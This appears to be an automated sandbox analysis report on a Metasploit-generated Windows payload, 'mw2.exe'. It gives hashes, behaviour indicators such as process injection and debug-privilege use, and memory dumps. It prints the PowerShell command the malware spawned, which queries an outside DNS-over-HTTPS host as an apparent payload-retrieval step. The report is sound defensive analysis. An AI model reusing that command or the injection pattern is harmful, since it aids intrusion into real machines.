metasploit | c36580036412cc938d9ecc1ce4747d61b9038a7e5e77447158d5aa134fed23bb

Analysis

max time kernel
119s
max time network
130s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
10-10-2023 22:28

Target

mw2.exe
Size

72KB
MD5

56b15ab58477bd660bad4708938d8987
SHA1

cd0b1b72b51f4985cca3ca9ea82c22a59d9cc9ed
SHA256

c36580036412cc938d9ecc1ce4747d61b9038a7e5e77447158d5aa134fed23bb
SHA512

bf0250851173e6d99c14813dc9c9a2f352913dd00249e485dc5bc78aafec026f385e19cdb692816269e33d8cd4ea96b80e9c91a06e4569e4dfeaa80bd1bb256a
SSDEEP

1536:ITysmp4pXaM33K+eHPBoo1bcN/+5Wq6NMb+KR0Nc8QsJq39:Gysm2XaTv6YYN+R6Ne0Nc8QsC9

Score

10^/10

Family

metasploit

Version

windows/exec

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2648	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2648	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2404 wrote to memory of 2648	2404	mw2.exe	28
PID 2404 wrote to memory of 2648	2404	mw2.exe	28
PID 2404 wrote to memory of 2648	2404	mw2.exe	28
PID 2404 wrote to memory of 2648	2404	mw2.exe	28

C:\Users\Admin\AppData\Local\Temp\mw2.exe
"C:\Users\Admin\AppData\Local\Temp\mw2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "Invoke-RestMethod -Uri 'https://cloudflare-dns.com/dns-query?name=example.com&type=A' -Headers @{'accept'='application/dns-json'} | Select-Object -ExpandProperty Answer | ForEach-Object { exe.data }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2648

memory/2404-0-0x0000000000020000-0x0000000000021000-memory.dmp

Filesize
4KB

Download
memory/2404-8-0x0000000000020000-0x0000000000021000-memory.dmp

Filesize
4KB

Download
memory/2648-3-0x0000000073720000-0x0000000073CCB000-memory.dmp

Filesize
5.7MB

Download
memory/2648-4-0x0000000073720000-0x0000000073CCB000-memory.dmp

Filesize
5.7MB

Download
memory/2648-5-0x0000000002160000-0x00000000021A0000-memory.dmp

Filesize
256KB

Download
memory/2648-6-0x0000000002160000-0x00000000021A0000-memory.dmp

Filesize
256KB

Download
memory/2648-7-0x0000000073720000-0x0000000073CCB000-memory.dmp

Filesize
5.7MB

Download